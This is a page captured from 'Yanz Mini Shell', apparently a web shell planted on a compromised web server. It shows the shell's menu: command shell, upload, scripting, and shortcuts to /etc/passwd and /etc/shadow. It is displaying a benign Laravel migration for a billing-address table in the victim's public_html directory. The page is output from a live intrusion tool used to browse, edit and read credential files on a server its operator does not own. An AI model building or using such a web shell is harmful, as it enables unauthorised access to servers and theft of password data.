Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
livewant
public_html
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php use Illuminate\Database\Migrations\Migration; use Illuminate\Database\Schema\Blueprint; use Illuminate\Support\Facades\Schema; return new class extends Migration { /** * Run the migrations. * * @return void */ public function up() { Schema::create('billing_addresses', function (Blueprint $table) { $table->id(); $table->foreignId('user_id')->constrained('users')->onDelete('cascade'); $table->string('name')->nullable(); $table->string('address')->nullable(); $table->string('phone')->nullable()->unique(); $table->string('email')->nullable()->unique(); $table->foreignId('country_id')->constrained('countries')->onDelete('cascade'); $table->foreignId('division_id')->nullable()->constrained('divisions')->onDelete('cascade'); $table->foreignId('district_id')->nullable()->constrained('districts')->onDelete('cascade'); $table->foreignId('upazila_id')->nullable()->nullable()->constrained('upazilas')->onDelete('cascade'); $table->integer('postal')->nullable(); $table->tinyInteger('terms_and_condition')->default(App\Enums\TermsAndConditions::UNACCEPTED); $table->timestamps(); }); } /** * Reverse the migrations. * * @return void */ public function down() { Schema::dropIfExists('billing_addresses'); } };
Free Space : 18305204224 Byte